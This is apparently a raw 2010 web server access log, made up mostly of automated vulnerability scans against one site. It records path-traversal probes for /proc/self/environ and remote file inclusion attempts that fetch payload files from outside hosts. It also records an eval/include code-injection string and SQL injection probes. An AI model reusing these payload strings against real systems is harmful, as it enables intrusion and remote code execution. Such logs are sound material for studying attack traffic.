205.251.131.18 - - [21/Jun/2010:01:14:54 -0400] "GET /logs/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:01:14:54 -0400] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:14:57 -0400] "GET /logs/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:14:57 -0400] "GET /spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:01:14:59 -0400] "GET /logs/access_log.Q110053100//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:14:59 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
64.15.156.75 - - [21/Jun/2010:01:14:59 -0400] "GET /logs/access_log.Q109080600%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
188.72.70.56 - - [21/Jun/2010:01:14:59 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:03 -0400] "GET /logs/access_log.Q110053100//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
94.136.63.119 - - [21/Jun/2010:01:15:03 -0400] "GET /?pg=http://inmobiliariapymsa.com/cache/test.gif?http://inmobiliariapymsa.com/cache/test2.gif?? HTTP/1.1" 200 409 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
94.136.63.119 - - [21/Jun/2010:01:15:03 -0400] "GET /logs/?pg=http://inmobiliariapymsa.com/cache/test.gif?http://inmobiliariapymsa.com/cache/test2.gif?? HTTP/1.1" 200 55286 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
94.136.63.119 - - [21/Jun/2010:01:15:03 -0400] "GET /?pg=http://inmobiliariapymsa.com/cache/test.gif?http://inmobiliariapymsa.com/cache/test2.gif?? HTTP/1.1" 200 409 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
188.72.70.56 - - [21/Jun/2010:01:15:03 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:04 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
94.136.63.119 - - [21/Jun/2010:01:15:04 -0400] "GET /logs/?pg=http://inmobiliariapymsa.com/cache/test.gif?http://inmobiliariapymsa.com/cache/test2.gif?? HTTP/1.1" 200 55286 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
188.72.70.56 - - [21/Jun/2010:01:15:19 -0400] "GET /logs/access_log.Q110053100//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:19 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:19 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:23 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:25 -0400] "GET /logs/access_log.Q110053100//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:25 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:25 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:26 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:40 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:48 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
205.251.131.18 - - [21/Jun/2010:01:15:54 -0400] "GET /logs/access_log.Q109120800/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:16:00 -0400] "GET /logs/access_log.Q109120800/index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:16:00 -0400] "GET /index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:16:00 -0400] "GET /logs/index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:16:01 -0400] "GET /logs/error_log.Q110051500/productdetail.php?id=' HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:16:01 -0400] "GET /productdetail.php?id=' HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:16:01 -0400] "GET /logs/productdetail.php?id=' HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
111.90.150.79 - - [21/Jun/2010:01:16:09 -0400] "GET /logs/access_log.Q110052200/index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
205.186.131.199 - - [21/Jun/2010:01:16:09 -0400] "GET /logs/access_log.Q109120800/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
75.125.138.2 - - [21/Jun/2010:01:16:13 -0400] "GET //modules/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:16:13 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:16:13 -0400] "GET /logs//modules/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:16:14 -0400] "GET //modules/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:16:14 -0400] "GET /logs//modules/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:01:16:14 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
205.251.131.18 - - [21/Jun/2010:01:16:15 -0400] "GET /logs/access_log.Q109120800/index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:01:16:15 -0400] "GET /index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:01:16:15 -0400] "GET /logs/index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.116.59.107 - - [21/Jun/2010:01:16:46 -0400] "GET /playing.php/common/db.php?commonpath=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:16:46 -0400] "GET /logs/access_log.Q109071100/playing.php/common/db.php?commonpath=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:16:46 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:16:46 -0400] "GET /logs/error_log.Q109071100/playing.php/common/db.php?commonpath=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:01:16:54 -0400] "GET /logs/access_log.Q109080600//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:01:16:54 -0400] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:01:16:54 -0400] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
205.186.131.199 - - [21/Jun/2010:01:17:06 -0400] "GET /logs/access_log.Q109070400/index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:01:17:17 -0400] "GET /logs/access_log.Q109070400/index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.218.116.169 - - [21/Jun/2010:01:18:28 -0400] "GET /images/_notes/store_anim.gif.mno HTTP/1.1" 200 178 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.206 - - [21/Jun/2010:01:18:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC53725640006DB300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
111.90.150.79 - - [21/Jun/2010:01:18:55 -0400] "GET /index.php?option=com_myfiles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
205.186.131.199 - - [21/Jun/2010:01:19:10 -0400] "GET /logs/access_log.Q110051500/productdetail.php?id=' HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:19:10 -0400] "GET /productdetail.php?id=' HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:19:10 -0400] "GET /logs/productdetail.php?id=' HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:19:54 -0400] "GET /logs/access_log.Q110051500/productdetail.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:19:54 -0400] "GET /productdetail.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:01:19:54 -0400] "GET /logs/productdetail.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
86.96.226.85 - - [21/Jun/2010:01:21:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
86.96.229.92 - - [21/Jun/2010:01:21:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
86.96.229.92 - - [21/Jun/2010:01:21:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
86.96.226.85 - - [21/Jun/2010:01:21:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
205.186.131.199 - - [21/Jun/2010:01:21:11 -0400] "GET /logs/error_log.Q110051500/productdetail.php?id=' HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
211.43.212.56 - - [21/Jun/2010:01:21:25 -0400] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "libwww-perl/5.822"
216.180.226.34 - - [21/Jun/2010:01:21:54 -0400] "GET / HTTP/1.1" 200 409 "-" "-"
205.186.131.199 - - [21/Jun/2010:01:22:10 -0400] "GET /logs/error_log.Q110051500/productdetail.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:01:22:24 -0400] "GET /logs/access_log.Q110060800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:24 -0400] "GET /logs/access_log.Q110060800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:24 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:24 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:25 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:25 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
194.42.16.25 - - [21/Jun/2010:01:22:29 -0400] "GET /logs/access_log.Q109080600%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2010:01:22:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.72.70.56 - - [21/Jun/2010:01:22:43 -0400] "GET /logs/error_log.Q110060800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
67.15.152.183 - - [21/Jun/2010:01:22:47 -0400] "GET /logs/error_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:22:47 -0400] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:22:47 -0400] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
188.72.70.56 - - [21/Jun/2010:01:22:50 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:50 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:52 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:22:55 -0400] "GET /logs/error_log.Q110060800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:23:05 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:23:05 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:23:05 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
125.249.199.195 - - [21/Jun/2010:01:23:09 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:01:23:09 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:01:23:09 -0400] "GET /logs/access_log.Q109070500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
205.186.131.199 - - [21/Jun/2010:01:23:09 -0400] "GET /productdetail.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:01:23:12 -0400] "GET /logs/error_log.Q110061300//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
62.43.194.164 - - [21/Jun/2010:01:23:15 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:01:23:15 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:01:23:15 -0400] "GET /logs/access_log.Q109070500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
188.72.70.56 - - [21/Jun/2010:01:23:31 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:23:31 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:23:32 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
67.15.152.183 - - [21/Jun/2010:01:23:33 -0400] "GET /logs/access_log.Q110052100/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
188.72.70.56 - - [21/Jun/2010:01:23:38 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:23:38 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:23:39 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
67.195.114.223 - - [21/Jun/2010:01:23:33 -0400] "GET /logs/access_log.Q109080200 HTTP/1.0" 200 2084930 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.218.209.178 - - [21/Jun/2010:01:23:52 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.218.209.178 - - [21/Jun/2010:01:23:53 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.218.209.178 - - [21/Jun/2010:01:23:53 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "Mozilla/5.0"
207.218.209.178 - - [21/Jun/2010:01:24:00 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.249.199.195 - - [21/Jun/2010:01:24:11 -0400] "GET /logs/access_log.Q110032700//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:01:24:26 -0400] "GET /logs/access_log.Q110032700//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
188.72.70.56 - - [21/Jun/2010:01:24:28 -0400] "GET /logs/error_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:24:34 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:24:35 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:24:36 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:01:24:38 -0400] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "libwww-perl/5.822"
95.108.245.251 - - [21/Jun/2010:01:24:44 -0400] "GET /logs/error_log.Q110060100 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
188.72.70.56 - - [21/Jun/2010:01:24:47 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:24:48 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:24:49 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:24:56 -0400] "GET /logs/access_log.Q110060800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:25:10 -0400] "GET /logs/error_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
209.20.81.163 - - [21/Jun/2010:01:25:13 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.20.81.163 - - [21/Jun/2010:01:25:14 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.20.81.163 - - [21/Jun/2010:01:25:15 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "Mozilla/5.0"
188.72.70.56 - - [21/Jun/2010:01:25:27 -0400] "GET /logs/error_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
209.20.81.163 - - [21/Jun/2010:01:25:28 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "Mozilla/5.0"
205.186.131.199 - - [21/Jun/2010:01:25:40 -0400] "GET /productdetail.php?id=' HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
125.249.199.195 - - [21/Jun/2010:01:25:52 -0400] "GET /logs/access_log.Q109070500%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
205.186.131.199 - - [21/Jun/2010:01:25:52 -0400] "GET /index.php?seite=17&aid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:01:25:57 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:25:58 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
